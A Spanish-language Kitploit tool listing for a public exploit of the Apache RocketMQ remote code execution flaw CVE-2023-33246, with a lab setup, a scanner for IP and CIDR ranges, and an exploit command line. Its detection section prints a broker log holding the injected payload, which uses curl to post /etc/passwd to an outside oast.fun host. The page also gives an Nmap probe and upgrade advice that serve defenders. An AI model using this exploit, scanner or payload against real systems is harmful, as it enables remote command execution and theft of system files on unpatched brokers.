Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-33246_RocketMQ_RCE_EXPLOIT — CVE-2023-33246 RocketMQ Detección de RCE por versión y exploit | Kitploit
Herramientas/GitHubGitHub/malayke/cve-2023-33246_rocketmq_rce_exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubmalayke/cve-2023-33246_rocketmq_rce_exploit

CVE-2023-33246_RocketMQ_RCE_EXPLOIT

CVE-2023-33246 RocketMQ Detección de RCE por versión y exploit

Ver Repositorio
10420hace 3 añosRevisado por Kitploit

CVE-2023-33246 Exploit de Ejecución Remota de Código en RocketMQ

CVE-2023-33246 Exploit de Ejecución Remota de Código en RocketMQ

Resumen

RocketMQ es una plataforma de mensajería y transmisión distribuida.

Las versiones de RocketMQ 5.1.0 y anteriores son vulnerables a la Inyección Arbitraria de Código. El componente Broker de RocketMQ está expuesto en la extranet y carece de verificación de permisos. Un atacante puede explotar esta vulnerabilidad utilizando la función de actualización de configuración para ejecutar comandos como los usuarios del sistema bajo los que se ejecuta RocketMQ. Además, un atacante puede lograr el mismo efecto falsificando el contenido del protocolo RocketMQ.

Configurar entorno local de RocketMQ mediante Docker

root@kitploit:~
docker pull apache/rocketmq:4.9.4
# Start nameserver
docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
# Start Broker
docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf

Detectar la versión de RocketMQ para identificar vulnerabilidades

root@kitploit:~
usage: check.py [-h] [--ip IP] [--file FILE] [--port PORT] [--cidr CIDR]

Verificar la vulnerabilidad CVE-2023-33246 RCE de RocketMQ

optional arguments:
  -h, --help   show this help message and exit
  --ip IP      Una dirección IP única para verificar
  --file FILE  Un archivo que contiene una lista de direcciones IP, una por línea
  --port PORT  El número de puerto a usar al conectarse al servidor (predeterminado es 9876)
  --cidr CIDR  Un rango CIDR para escanear (ej. 1.2.3.0/24)

ejemplos de uso

root@kitploit:~
python3 check.py --ip 127.0.0.1 --port 9876
python3 check.py --cidr 192.168.1.0/24
# or 
python3 check.py --file rocketmq_targets.txt --port 9876
# target in file format:
# ip
# ip:port
# http://ip:port

Ejecutar exploit

⚠️ Precaución: Tenga cuidado al ejecutar este script en su entorno de producción, ya que el payload incluido tiene la capacidad de modificar la configuración de RocketMQ.

root@kitploit:~
python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test

Sonda de Servicio Nmap

Agregue el siguiente contenido al archivo nmap-service-probes ubicado en el directorio de instalación de Nmap.

root@kitploit:~
##############################NEXT PROBE##############################
Probe TCP RocketMQ q|\x00\x00\x00\x64\x00\x00\x00\x60\x7b\x22\x63\x6f\x64\x65\x22\x3a\x32\x38\x2c\x22\x66\x6c\x61\x67\x22\x3a\x30\x2c\x22\x6c\x61\x6e\x67\x75\x61\x67\x65\x22\x3a\x22\x4a\x41\x56\x41\x22\x2c\x22\x6f\x70\x61\x71\x75\x65\x22\x3a\x30\x2c\x22\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x54\x79\x70\x65\x43\x75\x72\x72\x65\x6e\x74\x52\x50\x43\x22\x3a\x22\x4a\x53\x4f\x4e\x22\x2c\x22\x76\x65\x72\x73\x69\x6f\x6e\x22\x3a\x34\x33\x33\x7d|
ports 10911,11911,12911,13911
rarity 8

match RocketMQBroker m|"brokerVersionDesc":\s*"([^"]*)"| p/RocketMQ Broker/ v/$1/ cpe:/a:apache:rocketmq/

alt text

Procedimiento de Detección

En caso de que su Broker de RocketMQ haya sido comprometido, puede identificar esta situación observando ciertos patrones en el registro del broker, los registros del broker se verán así:

root@kitploit:~
2023-06-03 13:51:37 INFO AdminBrokerThread_5 - updateBrokerConfig called by 172.17.0.1:56412
2023-06-03 13:51:37 INFO AdminBrokerThread_5 - updateBrokerConfig, new config: [{filterServerNums=1, rocketmqHome=-c $@|sh . echo curl chxd6qa2vtc00007dfn0ge6sumayyyyyb.oast.fun --data @/etc/passwd;}] client: /172.17.0.1:56412 
2023-06-03 13:51:37 INFO AdminBrokerThread_5 - Replace, key: filterServerNums, value: 0 -> 1
2023-06-03 13:51:37 INFO AdminBrokerThread_5 - Replace, key: rocketmqHome, value: /home/rocketmq/rocketmq-4.9.4 -> -c $@|sh . echo curl chxd6qa2vtc00007dfn0ge6sumayyyyyb.oast.fun --data @/etc/passwd;

Mitigación

Actualice org.apache.rocketmq:rocketmq-broker a la versión 4.9.6, 5.1.1 o superior.

Referencias

  • Listas de Apache
  • Commit de GitHub
  • Commit de GitHub
  • Publicación de GitHub
Descargar herramienta